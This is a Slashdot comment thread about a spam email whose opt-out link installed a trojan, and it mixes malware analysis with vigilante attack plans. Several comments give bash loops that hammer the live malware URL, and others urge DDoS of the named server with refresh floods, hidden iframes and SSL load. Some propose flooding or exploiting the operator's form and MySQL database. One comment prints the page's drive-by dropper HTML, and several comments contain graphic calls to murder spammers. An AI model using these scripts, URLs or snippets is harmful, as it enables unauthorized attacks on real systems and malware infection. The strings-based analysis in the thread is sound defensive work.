    (x) Ideas similar to yours are easy to come up with, yet none have ever been shown practical
    ( ) Any scheme based on opt-out is unacceptable
    ( ) SMTP headers should not be the subject of legislation
    ( ) Blacklists suck
    ( ) Whitelists suck
    ( ) We should be able to talk about Viagra without being censored
    ( ) Countermeasures should not involve wire fraud or credit card fraud
    ( ) Countermeasures should not involve sabotage of public networks
    (x) Countermeasures must work if phased in gradually
    (x) Sending email should be free
    ( ) Why should we have to trust you and your servers?
    ( ) Incompatiblity with open source or open source licenses
    ( ) Feel-good measures do nothing to solve the problem
    ( ) Temporary/one-time email addresses are cumbersome
    (x) I don't want the government reading my email
    (x) Killing them that way is not slow and painful enough

    Furthermore, this is what I think about you:

    ( ) Sorry dude, but I don't think it would work.
    ( ) This is a stupid idea, and you're a stupid person for suggesting it.
    (x) You are a spammer

  42. Other sites on same server doing the same thing. by Chatmag · · Score: 4, Informative

    There is a slew of sites on that same server according to Webhosting Info that are infected, some with windows-update.exe and others with windows-update32.exe

    --
    Pete Carr Owner Chatmag.com
  43. But then again . . . by harley_frog · · Score: 5, Insightful

    it is a site worthy of a good slashdotting, if just to keep the unwary from reaching it.

    --
    It's all fun and games until someone loses the key to the handcuffs.
    1. Re:But then again . . . by mdfst13 · · Score: 5, Informative

      http://www.xcelent.biz/d/ is a link to another page in that domain. Also has more graphics for better slashdotting potential.

      P.S. Still be careful. They could always move the pages around.
    2. Re:But then again . . . by darkain · · Score: 1

      i dunno bout anyone else, but i cant even resolve the DNS. not sure if it was removed completely already, or my ISP is just trying to be ahead of the game (for once in their life)

  44. Ready for FUD against public bug lists by kabloom · · Score: 1

    Great. Now someone will use this as FUD against public security alert email lists.

  45. YARTNUIE by Ghengis · · Score: 1, Redundant

    Yet
    Another
    Reason
    To
    Not
    Use
    Internet
    Explorer.

    --

    "The best laid plans of mice and men gang oft agley..." - ROBERT BURNS

  46. Hazardous link by abb3w · · Score: 4, Informative
    Now, now, there might be someone who might go to that page with IE. However, no doubt the Slashdot community would be interested in attempting their own effort at reverse engineering the trojan that they want you to download.

    Of course, anyone who installs that on a non-isolated, non-virtual machine pretty much deserves the results. It looks like it has the standard "Software\Microsoft\Windows\Current Version\Run", "Software\Microsoft\Windows\Current Version\RunServices", and "SYSTEM\CurrentControlSet\Control\SafeBoot\" registry hooks. (Unix "strings" is your friend....)

    --
    //Information does not want to be free; it wants to breed.
    1. Re:Hazardous link by Enoch+Zembecowicz · · Score: 1

      Just doing my part... #!/bin/bash while true; do wget http://www.xcelent.biz/o/windows-update32.exe rm windows-update32.exe done

      --
      "Who's going to believe a talking head?" - Herbert West
    2. Re:Hazardous link by Enoch+Zembecowicz · · Score: 1

      Damned need for html.. #!/bin/bash
      while true;
      do
      wget http://www.xcelent.biz/o/windows-update32.exe
      rm windows-update32.exe
      done

      --
      "Who's going to believe a talking head?" - Herbert West
    3. Re:Hazardous link by Abalamahalamatandra · · Score: 1

      You know, if MS /really/ wanted to make SP2 do the right thing, you'd think they would have put in a service to monitor all the regkeys/win.ini/whatever points that software gets autorun, and then scream loudly and ask for confirmation when something tries to use them.

    4. Re:Hazardous link by ocelotbob · · Score: 1
      #!/bin/bash
      while true;
      do
      lynx -dump http://www.xcelent.biz/o/windows-update32.exe > /dev/null
      done

      Why sully your hard drive with a copy of this file?

      --

      Marxism is the opiate of dumbasses

    5. Re:Hazardous link by xouumalperxe · · Score: 1

      that'd be FAR too cumbersome for Joe User (and plain annoying for the hacker as well). And there ARE 3rd party programs that DO fish for all autorun spots of the registry and list the "offenders". It's not like MS has to do everything. They're just a bunch, compared to us lot ;)

    6. Re:Hazardous link by BillX · · Score: 1

      It would be nice though, if MS at least documented ALL the startup locations, preferably in a big file named "All The Possible Start-Up Locations For Win[2000]" (etc.)

      It started simple enough; there were the CurrentVersion\Run , \RunServices and a few similar keys we all know and love, all lined up in a row.

      Then new Windowses start coming out with more Registry keys that can load malicious code on startup. Once people were diligently monitoring Run and RunServices, the malware vendors discovered ShellServiceObjectDelayLoad...now that's diligently monitored (by a select few), but wait....what are we up to now? CurrentControlSet\Control\SafeBoot\ ?

      That's a new one to me. What auto-crap-loading key will they discover next?

      --
      Caveat Emptor is not a business model.
    7. Re:Hazardous link by Anonymous Coward · · Score: 0

      Hey, why can I still download this thing? Would someone please hack that server and replace the file with a Goatse image?

    8. Re:Hazardous link by Anonymous Coward · · Score: 0

      Yes that works! I think I'll leave that loop running tonight - see whether /dev/null ever gets full... ;-)

  47. Can't someone sue by fsterman · · Score: 1

    There is an actual company backing this spam and website, couldn't someone sue for damages?

    --
    Is there anything better than clicking through Microsoft ads on Slashdot?
  48. Re:Slightly OT-Malicious spam opt-outs and MYPOINT by Anonymous Coward · · Score: 0
    Has anyone else had the same thing happen?
    Since most /. readers are smart enough not to use an opt-out link in spam (and prove to the spammer that the spam is actually read) I doubt if many /. readers have this problem.

    Of course there's always a stupid person or two that uses opt-out links on spam...

  49. Justifiable homicide? by www.sorehands.com · · Score: 1

    If you are caught killing a spammer, get a jury that has e-mail -- they will never convict.

    1. Re:Justifiable homicide? by Anonymous Coward · · Score: 0

      agreed. I wish there was a law to kill spammers in America. Would be nice. As it is you can't bribe people very well there.

      I think every spammer should be shot, reshot, and tossed to the side of a road like a dead clown.

  50. Re:Slightly OT-Malicious spam opt-outs and MYPOINT by Anonymous Coward · · Score: 0
    Well, I work there, so...

    No, I can't really conceive of that happening unless it wasn't an e-mail from us. I can definitely testify that, getting mail from them on my hotmail account, they send 4-5 pieces of mail a day on average. But I have talked to enough people on my floor that are concerned with unintentionally sending spam that they aggressively make sure they have their backs covered.

    Probably not the answer you were looking for, but that's how I see things from here.

  51. Refresh Every Minute by Anonymous Coward · · Score: 0

    The url you want to hit to DDOS this is:
    http://www.xcelent.biz/d/

    It's heavy in images.

    There used to be a Firefox extension that you could use to refresh a page every N minutes, anyone know what that was?

    If enough people set this to refresh every 1 minute, and left if open all day, this server would just cease to exist.

    Since this same machine is FULL of spam and malicious sites:
    http://whois.webhosting.info/61.218.79.53

    This seems like a good idea...

    1. Re:Refresh Every Minute by inode_buddha · · Score: 1

      You could just wget it all into /dev/null inside a while loop; wget exits and returns 0 which triggers the loop again. Maybe not a great idea to do that from your own IP tho, just in case.

      --
      C|N>K
    2. Re:Refresh Every Minute by terrencefw · · Score: 1

      Yeah cool... let's set up a coral link so we all get a chance!

      --
      Like tinyurl, but one letter less! http://qurl.co.uk/
    3. Re:Refresh Every Minute by Anonymous Coward · · Score: 0
      This works:
      $ while true;
      do
      lynx -dump http://www.xcelent.biz/o/windows-update32.exe > /dev/null
      done

      I'll just leave it running over night...

  52. How about? by phorm · · Score: 1

    How about creating a new DB? Some mySQL exploits?

    We could populate that sucker with crap records for eternity and fill his HDD...

    I can't do it right now because I'm at work... how about somebody with 'leet mySQL hacking skills that's at home right now?

    1. Re:How about? by Anonymous Coward · · Score: 0

      This seems the most obvious one.

  53. Blocked.. by LaPistola · · Score: 1

    "Request blocked by WebBlocker" Thanks for the heads-up /.! Now none of our users will be affected.. no matter what the browser :)

  54. Quick .EXE Analysis by terrencefw · · Score: 3, Interesting
    As one other poster pointed out, running 'strings' on the executable reveals itself to be 'xProxyBot'.

    Some other strings give a few clues about what it does:

    • Software\Microsoft\Windows\CurrentVersion\Run - It installs itself in the registry.
    • Mozilla/4.0 (compatible) - It grabs stuff off the web and tries to look like IE in the logs.
    • SYSTEM\CurrentControlSet\Control\SafeBoot - Tries to get started in safe mode too.
    It installs itself in Software\Microsoft\Windows\CurrentVersion\Run as 'w32.exe'. I don't see it doing very much though. I've let it loose on a VMWare '98 session. No opened ports (unless it responds to portknocking), no attempts at outbound communication, maybe '98 is too old for it!
    --
    Like tinyurl, but one letter less! http://qurl.co.uk/
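Added example (not part of any comment in this thread): a small Python version of the `strings` triage described in comments 46 and 54, which pulls printable ASCII and UTF-16LE runs out of a binary and flags the autorun registry paths and User-Agent string the posters reported. The sample bytes are constructed for the demonstration and the labels are this example's own wording.

```python
import re

MIN_LEN = 6  # shortest printable run worth keeping, to skip noise

# Patterns for the strings the commenters reported seeing; the labels are this
# example's own. (?![A-Za-z]) stops "Run" from also matching "RunServices".
INDICATORS = [
    (re.compile(r"CurrentVersion\\RunServices", re.I), "autorun: RunServices key"),
    (re.compile(r"CurrentVersion\\Run(?![A-Za-z])", re.I), "autorun: Run key"),
    (re.compile(r"ShellServiceObjectDelayLoad", re.I),
     "autorun: ShellServiceObjectDelayLoad"),
    (re.compile(r"CurrentControlSet\\Control\\SafeBoot", re.I),
     "SafeBoot key reference"),
    (re.compile(r"Mozilla/4\.0 \(compatible\)"), "hard-coded browser User-Agent"),
]


def extract_strings(data, min_len=MIN_LEN):
    """Return printable strings found in raw bytes, like Unix `strings`.

    Windows binaries often store text as UTF-16LE, which plain `strings`
    misses without `-e l`, so both encodings are scanned.
    """
    ascii_runs = re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)
    wide_runs = re.findall(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data)
    found = [run.decode("ascii") for run in ascii_runs]
    found += [run.decode("utf-16-le") for run in wide_runs]
    return found


def triage(data):
    """Return (label, string) pairs for every extracted string that matches
    an indicator, in order of appearance and without duplicates."""
    findings = []
    for text in extract_strings(data):
        for pattern, label in INDICATORS:
            if pattern.search(text) and (label, text) not in findings:
                findings.append((label, text))
    return findings


# Constructed sample, NOT the real file: a few bytes of header-like noise,
# one ASCII registry path, a file name, one UTF-16LE registry path and a
# User-Agent string, separated by non-printable bytes.
SAMPLE = (
    b"MZ\x90\x00\x03\x00\x00\x00"
    b"Software\\Microsoft\\Windows\\CurrentVersion\\Run\x00"
    b"\x01\x02w32.exe\x00\x03"
    + "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\".encode("utf-16-le")
    + b"\x00\x00Mozilla/4.0 (compatible)\x00\xff\xfeabc\x00"
)

if __name__ == "__main__":
    for label, text in triage(SAMPLE):
        print(f"{label:40} {text}")
```

Run it only against a copy of a suspect file held on an isolated analysis machine; string matches show what a binary references, not what it actually does at run time.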
  55. I just got exploited by iMaple · · Score: 3, Informative

    I decided to try it out on my Windows machine, so opened the link in IE. I had Win XP SP2 and an updated Norton Antivirus and the (new ) Win XP firewall on.
    But the exploit worked !! I was expecting to get a pop up from NAV with an exciting alarm sound .
    (Un)Fortunately since it worked now I know what it does :
    1) Add the windows-update.exe in the startup folder
    2) Add a new file cmd.dat to the startup folder.
    Anyway since I had gone so far, I tried running the Windows-update , but that gave me the error that it was not a valid exe file. I ran it in the protected mode (available when u select run as.. in Win XP). Then I renamed the dat file to .exe and ran that in the protected mode too. It ran !! It tried to access the internet but I hope the WinXP 2 firewall stopped it. Anyway got sort of scared since my Win Laptop is not junk and I use it whenever I need a Laptop with standby and Powerpoint. So now I have deleted the files. Can't see any new services in the registry either so hopefully my machine isn't yet a spam mail relay.
    BTW if anyone else has tried it out and know about something else that should be done pls let me know. And does anyone have a clue why NAV does not detect this ?? Maybe u need to activate it for IE or make IE the default browser ???

    1. Re:I just got exploited by Anonymous Coward · · Score: 0

      because norton is CRAP.

      do a search on Google for antivir. download it install it update it.

      Now you have a FREE antivirus program that is better, faster and certainly more up to date than Norton.

      only fools use norton after knowing about antiVir.

    2. Re:I just got exploited by Anonymous Coward · · Score: 0

      Wrap your machine in black plastic and then burn it.

      It's the only way to be sure.

    3. Re:I just got exploited by Kreigaffe · · Score: 1

      No no no no no no... Nuke from orbit.. THAT'S the only way to be sure

      --
      ... still waiting for this free-as-in-beer free beer I keep hearing about. :|
  56. The Final Solution to Spam by cryptochrome · · Score: 2, Funny

    Flash Lynch Mobs.

    --

    ---If you can't trust a nerd, who can you trust?

  57. Campaign contributions? by samberdoo · · Score: 1

    Has anyone ever documented how much spammers contribute to politicians campaigns? They certainly have been effective in keeping significant legislation from being passed and significant enforcement from taking place.

    1. Re:Campaign contributions? by Anonymous Coward · · Score: 0

      There have been campaign contributions associated with stifling anti-spam legislation, but they do not come from the spammers themselves; they come from the direct marketing association and companies like Microsoft that (rightfully or wrongfully) fear that legislation written by technically illiterate lawmakers could affect them.

      The truth is that the worst spam comes from fly by night operations too small to be on the radar of any congressman. If somehow, we could have legislation targeted at them exclusively, we might be able to get some laws.

    2. Re:Campaign contributions? by ocelotbob · · Score: 1

      The problem with these guys is that their site's in China and thus difficult to trace who's really financing them. Much like those coolwebsearch shitbags who are in Russia. International boundaries make it unfortunately hard to trace who owns what.

      --

      Marxism is the opiate of dumbasses

  58. Your sig by System.out.println() · · Score: 1

    I thought it was "gang aft agley"?

  59. No it hasn't, MOD TROLL by cliveholloway · · Score: 1

    view page source (not frame source).

    cLive ;-)

    --
    -- Trinity in high heels carrying a whip: The donimatrix - there is no spoonerism
  60. Disable Javascript and Java by bradbury · · Score: 1

    Duh... How stupid do you want to present yourself as? You are having foreign code executing on your computer. How many friggin computers infected does this need to present a problem for before people get a clue?

    Bottom line: EXECUTING FOREIGN COMPUTER CODE (be it Javascript or Java) IS A POTENTIAL HAZARD. Solution: Disable the execution of such code in your browser. Don't reactivate it until providers (of Javascript or Java) allow you to sue them for liability. Until then they don't trust their own code and neither should you.

    Disclosure -- there are extensive other hazards being exploited by SPAMers, etc which involve executable programs that may be communicated via email. People should be aware of them. Perhaps the best diagnosis and intervention in this situation would be -- if you are running Windows? Don't.

    1. Re:Disable Javascript and Java by Anonymous Coward · · Score: 0

      Yeah Sure:

      -------------
      EXECUTING FOREIGN COMPUTER CODE (be it Javascript or Java) IS A POTENTIAL HAZARD. Solution: Disable the execution of such code in your browser. Don't reactivate it until providers (of Javascript or Java) allow you to sue them for liability). Until then they don't trust their own code and neither should you.
      -------------

      Problem 1 = Joe Sixpack runs an insecure system
      Problem 2 = Joe Sixpack Doesn't know what (...enter ANY computer term here...) is anyway....
      Problem 3 = Joe Sixpack clicks when it says 'click here'
      problem 4 = 90% of the world = Joe Sixpack

  61. Perfect DDOS by DigitalRaptor · · Score: 1

    Here is the perfect way to DDOS a site like this... Pick a non-malicious, graphics intensive site on the same server: http://www.xcelent.biz/d/ If you have a website, particularly a high traffic one, add a 1 x 1 IFRAME to your site that loads their site. Now, everyone that comes to your site loads their site. The best part is, your IP and URL never show up in their logs. With only a few high traffic sites doing this, I'm not sure how their server could survive. And if it did, their bandwidth bill certainly would not.

    --
    Lose Weight and Feel Great with Isagenix
    1. Re:Perfect DDOS by ocelotbob · · Score: 1

      Your domain/IP does show up in the logs though. Every HTTP request has a referrer field which is used to track these things -- it's how hotlink blocking and stuff works.

      --

      Marxism is the opiate of dumbasses

  62. Re:6 free gmail invites lastmeasure@gmail.com by Anonymous Coward · · Score: 0

    Go ahead, spam me. Gmail has some of the best spam filtering out there.

    P.S., it's great to see Slashbots show their hypocrisy - they don't like spam themselves but they are happy to try (and fail) to subject other people to it.

  63. Secure Server by iMaple · · Score: 1

    Since xcelent.biz is in the news I decided that it would be a reliable place to place an order for Viagara.

    So went to their order site : Order Viagara and here is what they claim
    This is a SECURE server and your personal and credit card information is protected.
    Now if they have a certificate then I thought they would be easily traceable, but unbelievably the server was not secure ( I mean their server could be secured and stored in the darkest dungeons but they did not use https ). Now that gives us all a really cool incentive for using Firefox 1.0 (it shows a lock in the address bar for secured site). Of course I am still going to stick around with IE, the automated install is simply awesome, just scroll down and you are done, no clicking on pesky warning messages and shit.

  64. Re:Slightly OT-Malicious spam opt-outs and MYPOINT by JimDabell · · Score: 1

    Next time, give them an email address of username+mypoints@google.com. That way, if spam comes in, you'll be able to tell whether or not mypoints were the people that sent it or sold the address to spammers.

  65. Can't we just deal with this already by gelfling · · Score: 2, Interesting

    I like a good practical joke as much as the next person. Can we just track down one of these people, drag him/her outside chop them up with bolo knives hunt down their families, rape mutiliate and murder them set fire to their houses, kill their dogs and piss all over the corpses already?

    I figure 10, 20 thousand of these losers tops and the problem will go away.

    1. Re:Can't we just deal with this already by sapped · · Score: 1

      Can't we just deal with this already (Score:2, Interesting)
      by gelfling (6534) Neutral on 2004.09.22 12:06 (#10319989) ( http://slashdot.org/ )

      I like a good practical joke as much as the next person. Can we just track down one of these people, drag him/her outside chop them up with bolo knives hunt down their families, rape mutiliate and murder them set fire to their houses, kill their dogs and piss all over the corpses already?

      I figure 10, 20 thousand of these losers tops and the problem will go away.


      This is marked as interesting? Wow.

    2. Re:Can't we just deal with this already by Maestro4k · · Score: 2, Insightful
      • I like a good practical joke as much as the next person. Can we just track down one of these people, drag him/her outside chop them up with bolo knives hunt down their families, rape mutiliate and murder them set fire to their houses, kill their dogs and piss all over the corpses already?

        I figure 10, 20 thousand of these losers tops and the problem will go away.

      While I appreciate the sentiment (personally I'm thinking boiling oil would be appropriate for spammers) I doubt it'd help. Even with the death penalty in the US we still have far far too many murders/rapes/etc. so it doesn't seem to work as a deterrent. All we'd end up with is lots of dead spammers (good) but plenty more rushing to take their places (bad). Just look at the meth problem, last night on the news we heard that the county sheriff in one of the nearby counties ended up busting his wife's cousin for cooking meth. People just get greedy and completely overlook the possible consequences. We're not going to be able to stop these problems with laws or conventional punishments.

      That said we need to find a way to make spam stop paying. If there's no money in it, or it gets to where it's a near certainty you'll lose all you made (and then some) from hefty fines people will move on to something else to try to make a quick buck.

    3. Re:Can't we just deal with this already by slappyjack · · Score: 1

      Even with the death penalty in the US we still have far far too many murders/rapes/etc. so it doesn't seem to work as a deterrent.

      Maybe thats because we don't actually apply the death penalty in most cases. Telling someone that you're going to punish them will act as a deterrent only if you DO punish them.

      I'm just saying.

  66. Test new Spamassasin 3.0.0 against this! by Chuck+Bucket · · Score: 2, Insightful

    If SA 3.0 is running with SUBL support, how can we add: www.xcelent.biz to the SUBL list? In that case, SA 3.0 would block this email altogether. I think this is a killer feature of SA now, and I'm waiting to learn more about it so I can update my current 2.x version running on my home mailserver.

    PCB$@#

    1. Re:Test new Spamassasin 3.0.0 against this! by Thng · · Score: 1
      I checked it this morning, and surbl.org lists that URL as blocked.

      Go check it here

  67. BWHAHAHAHA! by Anonymous Coward · · Score: 1, Informative

    Honestly, if you "surf" the web these days with:

    1) Flash
    2) Java
    3) Javascript

    You are simply asking for an anal reaming. The answer is to use a "secure" browser for common everyday browsing, which will display html and pictures. No cookies, flash, java, or javascript.

    And then use a second browser and copy/paste the url when you need more functionality.

    1. Re:BWHAHAHAHA! by dead+sun · · Score: 1
      Nope, with recent exploits against graphics rendering libraries that's not even safe.

      Time to fire up lynx.

      --
      If not now, when?
  68. Good thing I use Macs and Linux then... by Cybertect · · Score: 2, Funny

    I don't have to worry about Windows viruses *and* fake scroll-bars will stick out like sore thumbs :)

  69. And people say ICANN is worthless... by miu · · Score: 2, Interesting
    By creating the .biz TLD they created a shyster scum ghetto I can easily ignore.

    Thank you ICANN! :)

    --

    [Set Cain on fire and steal his lute.]
  70. Better Port to Slashdot by Anonymous Coward · · Score: 0

    We probably cannot bring it down using the 80 link, but the SSL link will peg the spammer's CPU without much effort on our part.

    **********HAZARDOUS LINK****************
    This is the link to the page. DO NOT CLICK on this if you are running IE.

    https://61.218.79.53/

  71. Re:wget by Anonymous Coward · · Score: 0

    i've added the 10000 digits of pi link as a referer to my wget of d, should help with the log filling and bandwidth at the same time

  72. Spam 'opt outs' are only used by spammers to... by Assmasher · · Score: 1

    ...verify that your e-mail is valid.

    Never reply to an opt-out even if running a secure e-mail application.

    --
    Loading...
  73. Re:MOD GRANDPARENT (with inocuous address) UP. by Anonymous Coward · · Score: 0
    Are people on /. really still both
    1. using IE for anything!?!
    2. not updating antivirus definitions (or apt-get upgrade or equivalent) to keep up-to-date on security patches!?!
    _and_ clicking on active-x controls in those windows!?!

    I can't imagine this would be dangerous for anyone here.

  74. I block all .biz by emptybody · · Score: 2, Interesting

    what, you dont have a .com?
    get over it.

    --
    comment directly in my journal
  75. Simple really... by johannesg · · Score: 2, Informative

    They hired Slashdot to take it down, and we are working on it even as I type this.

  76. Re:Slightly OT-Malicious spam opt-outs and MYPOINT by ricotest · · Score: 1

    My knowledge of RFCs is a little sketchy. Am I right in saying that if you use (in my case) richardjharris+mypoints@gmail.com, the email still gets through but has a different To: header? That would be ideal... except for the fact I'd still get spam. But it'd be ideal on one of my junk accounts.

  77. Re:MOD GRANDPARENT (with inocuous address) UP. by Anonymous Coward · · Score: 0
    _and_ clicking on active-x controls in those windows!?!

    The point is this exploit doesn't ask you if you wish to download the problem code, it does it without asking. Are you really so naive that you think all the spyware/adware/virus comes from people clicking "ok" to those confirmation boxes?

    Are you really that confident that your AV software is working? Would you tell a bad guy it's OK to shoot you because you are wearing a Kevlar vest?

    Oh yeah, you've passed all the tests you mentioned, yet are still too dumb/lazy to remove the space the author told you he inserted on your own.

    Dang it, where's the "-1 Bitch Slap" mod when you need it?

  78. MOD PARENT DOWN! by temojen · · Score: 1

    MOD PARENT DOWN!

    That link just (after a few steps) sends you back to the trojan.

    1. Re:MOD PARENT DOWN! by Anonymous Coward · · Score: 0

      But not automatically, right? The link itself goes to a CGI script that eventually redirects to a static, non-trojaned page. If you need explanation that you shouldn't go to a trojaned site with IE and then navigate around, you don't need moderators, you need a Darwin Award.

  79. Opt out? by killua · · Score: 1

    The entire idea sounds good in theory, but in practice it doesn't even touch the problem at hand. Also on that same note, it was only a matter of time before someone discovered that they can trick users *gasp* into clicking opt out for a few nasty surprises.

  80. Opt Out Sux by Nom+du+Keyboard · · Score: 1
    Opt out sucks. It has always sucked. It continues to suck. It will always suck.

    Lawmakers, get a clue!

    --
    "It's the height of ridiculousness to say for those 9 lines you get hundreds of millions."
  81. Firefox and Linux by Anonymous Coward · · Score: 0
    After entering my Email address (NiceTry@sshole.com), I was relieved to see that my name had been taken off their list:
    Your email address has been removed from our database.
    Anyway, here's a piece of the code:
    <img id="dyn" dynsrc="./windows-update32.exe" border="0" style="filter:alpha(opacity=0);z-index:10;width:30 px;height:100%;position:absolute;padding: 0px 0px 0px 0px;right:0px;top:0;" onDragStart="startDrag();" onDragEnd="endDrag();" onClick="startClick()">
  82. Opt-In Email Lists Are Best by Anonymous Coward · · Score: 0

    Opt-In Email Lists Are Best!
    You can get a free open-source one at:
    http://www.technobreeze.com/php/emaillist/

  83. Err...no by kolly+kibber · · Score: 2, Insightful
    The requirement is that they have a link to opt out. There is a link to opt out.

    Wow, you mindlessly repeated the mistaken conclusion of the article submitter.

    If the link doesn't allow you to opt out, it's not an opt out link, is it?

    If the law requires that I have a valid licence when driving, is it OK if I call my dog "a valid licence" and have him sit in the back seat? "Everything is in order, officer. I have 'a valid licence' back here..." Just because you call a thing something, doesn't make it that thing.

    --
    With that reward money, I could afford this life-sized chocolate God, filled with an infinite number of smarties.
    1. Re:Err...no by NatasRevol · · Score: 1

      If it allows you to opt out using anything but IE, isn't it an opt out link? It's just that you're using a faulty browser.

      --
      There are two types of people in the world: Those who crave closure
    2. Re:Err...no by Anonymous Coward · · Score: 0

      Who says the opt-out link doesn't work? Maybe it does opt out. After all, why would they want to bombard their own zombie workforce with spam?

  84. No maxlength on input field by caffeine_monkey · · Score: 1

    The "Email Addr" field at the bottom of the page doesn't use a maxlength property to limit the input. Here's what happens when you try to insert too much data:

    cgi-lib.pl: Request to receive too much data: 945020 bytes

    Now let's go fill his DB from the front end!

  85. This just makes me say... by jangobongo · · Score: 1

    ...thank god I have a Mac!

    I went to the website to see for myself (and to do some /.ing) and the script tried twice to download the .exe file to my computer without my even touching the scrollbar.

    --

    Sig cancelled due to lack of interest
  86. 250 million rows and counting by Anonymous Coward · · Score: 0
    mysql> select count(*) from foobar;
    +-----------+
    | count(*) |
    +-----------+
    | 251920977 |
    +-----------+
    1 row in set (1 min 24.42 sec)
  87. Even Dumber.... by Anonymous Coward · · Score: 0

    ...is the very concept of allowing HTML code: clickable links and active crap to be put into the main body of SMTP emails at all. SMTP email was never intended for that in the first place. It was intended for simple text transport only to convey messages. Even just adding on binary attachments was an afterthought, and should have been left at that. At least attachments can be easily isolated and scanned for malware.

    Brings to mind the old saying: "Just because you *can* do something doesn't mean that you *should* do it."

    1. Re:Even Dumber.... by Frizzle+Fry · · Score: 1
      ...is the very concept of allowing HTML code: clickable links and active crap to be put into the main body of SMTP emails at all.

      Can you clarify what mail program you are referring to with the "active crap" comment? I've used pine, outlook and some of the web-based mail clients (hotmail, gmail, yahoo mail) and none allow "active crap" in mail (disregarding very old versions of outlook, I think).
      --
      I'd rather be lucky than good.
  88. Whois earthlabs.biz by Anonymous Coward · · Score: 0

    Domain Name: EARTHLABS.BIZ
    Domain ID: D7451374-BIZ
    Sponsoring Registrar: ENOM, INC.
    Domain Status: clientHold
    Domain Status: clientTransferProhibited
    Registrant ID: DANIDANAE15B3AD6
    Registrant Name: Domain Administrator
    Registrant Organization: Askfind Ventures
    Registrant Address1: GPO Box 8912
    Registrant Address2: Central
    Registrant City: Hong Kong
    Registrant Postal Code: Nil
    Registrant Country: Hong Kong
    Registrant Country Code: HK
    Registrant Email: askfindpay@yahoo.com
    Administrative Contact ID: DANIDANAE15B3AD6
    Administrative Contact Name: Domain Administrator
    Administrative Contact Organization: Askfind Ventures
    Administrative Contact Address1: GPO Box 8912
    Administrative Contact Address2: Central
    Administrative Contact City: Hong Kong
    Administrative Contact Postal Code: Nil
    Administrative Contact Country: Hong Kong
    Administrative Contact Country Code: HK
    Administrative Contact Email: askfindpay@yahoo.com
    Billing Contact ID: DANIDANAE15B3AD6
    Billing Contact Name: Domain Administrator
    Billing Contact Organization: Askfind Ventures
    Billing Contact Address1: GPO Box 8912
    Billing Contact Address2: Central
    Billing Contact City: Hong Kong
    Billing Contact Postal Code: Nil
    Billing Contact Country: Hong Kong
    Billing Contact Country Code: HK
    Billing Contact Email: askfindpay@yahoo.com
    Technical Contact ID: DANIDANAE15B3AD6
    Technical Contact Name: Domain Administrator
    Technical Contact Organization: Askfind Ventures
    Technical Contact Address1: GPO Box 8912
    Technical Contact Address2: Central
    Technical Contact City: Hong Kong
    Technical Contact Postal Code: Nil
    Technical Contact Country: Hong Kong
    Technical Contact Country Code: HK
    Technical Contact Email: askfindpay@yahoo.com
    Name Server: NS1.WEBSOUTH.WS
    Name Server: NS2.WEBSOUTH.WS
    Created by Registrar: ENOM, INC.
    Last Updated by Registrar: ENOM, INC.
    Domain Registration Date: Thu Jul 29 06:02:08 GMT 2004
    Domain Expiration Date: Thu Jul 28 23:59:59 GMT 2005
    Domain Last Updated Date: Wed Sep 22 15:41:04 GMT 2004

    ------

    added to stop lame filter


    1. Re:Whois earthlabs.biz by Anonymous Coward · · Score: 0
  89. Fill his database by caffeine_monkey · · Score: 4, Interesting

    It looks like he's not checking the field length of that "email addr" input before inserting it into the DB, so it should be a simple matter for someone to write a script to continuously loop through a POST to http://61.218.79.53/o/cgi-bin/removeme.cgi with a large amount of data in the field name "email". If a few people do this, his DB should fill up pretty quick.

    1. Re:Fill his database by DigitalRaptor · · Score: 1

      You assume he is even storing that data. It is quite possible the whole site is just a fraud to install his malware. Why store email addresses he already has? He sent the spam to that address in the first place. If I were in his shoes, doing what he's doing, I'd have no reason to store the addresses. It would be interesting to "remove" a very specific account that is known nowhere else and see if it magically starts getting spam. Using the remove page as an email harvester is the only reason I can see to store the addresses entered (a lot of people put in ALL of their addresses on pages like this, not just the one that they received the email at).

      --
      Lose Weight and Feel Great with Isagenix
    2. Re:Fill his database by Anonymous Coward · · Score: 0

      Why store email addresses he already has?

      To identify the live ones?

    3. Re:Fill his database by gad_zuki! · · Score: 2, Informative

      Because people typing their email addresses into that box means it's a "known-good" email address. A list of known-goods beats a list of dead addresses any day of the week.

  90. Honestly, why would you do this? by Anonymous Coward · · Score: 0


    Why would you subject an important machine with important software/data to a potentially dangerous and well-known attack with as-of-yet unknown consequences?

    It would have been much more prudent to format, install a clean copy of the OS, perform the test and reformat. Or try the attack in a virtual OS on a different parent OS.

    I hate to say it, but it sounds like you deserved what you got ;) Best of luck and don't keep your machine plugged into the net anymore.

    1. Re:Honestly, why would you do this? by iMaple · · Score: 1

      Well my Windows m/c is not important, I don't have much data on this. I just said that I use Windows on this bcos standby doesn't work properly in Linux.

      I hate to say it, but it sounds like you deserved what you got ;)
      I don't agree with u there. Thanks for your best wishes though. Anyway my m/c is still on the net, so good luck to you too. :)

  91. Just forward these e-mails to your legislators ... by smoyer · · Score: 2, Insightful

    asking that they revisit the CAN-SPAM act. When they click the scrollbar in the forwarded message, they'll finally understand why we didn't think the original bill was tough enough.

  92. Re:Slightly OT-Malicious spam opt-outs and MYPOINT by JimDabell · · Score: 1

    It's not an email standard, according to the RFCs everything before the @ is called the "local part" and is interpreted in a system-specific manner once it arrives on the server. However the use of +suffix or -suffix is quite common and gmail supports it - so if you send an email to the address you mentioned, it would appear in the same mail account as richardjharris@... but with a different destination address, so you could filter on it or simply find out which address spam was sent to after the fact.

  93. what F-Secure says by scubacuda · · Score: 1
    When you try to download the trojan, my AV classifies it as:

    infection: backdoor.win32.agent.ce

  94. Opt out link? by Tooxs · · Score: 1

    "Scarily the E-mail actually complies with the CAN-SPAM act as it only requires spammers to put an opt-out link in their mailings."

    I would think that unless the link actually lets you opt out that it wouldn't qualify as an opt out link. No matter what you titled it.

  95. But if you outlaw malicious attacks... by Anonymous Coward · · Score: 0

    only outlaws will have malicious attacks!

    Oh, wait...

  96. $ strings windows-update32.exe by Fudge.Org · · Score: 1

    xProxyBot v 1.0.0
    1.0.0
    w32.exe
    Windows Service Application
    www.earthlabs.biz
    sockproxy/rec.php
    Software\Microsoft\Windows\CurrentVersion\Run
    Software\Microsoft\Windows\CurrentVersion\RunServices

    --
    http://fudge.org
  97. Okay... by Tuxedo+Jack · · Score: 1

    I took a look at this thing, and from the look of it, it appears to be a standard IRC bot. You know, the ones that run as whatever the logged-in user is?

    Root, FTP access, HTTP access, an open proxy, the usual. Seems that the little bastard is being rather the norm these days.

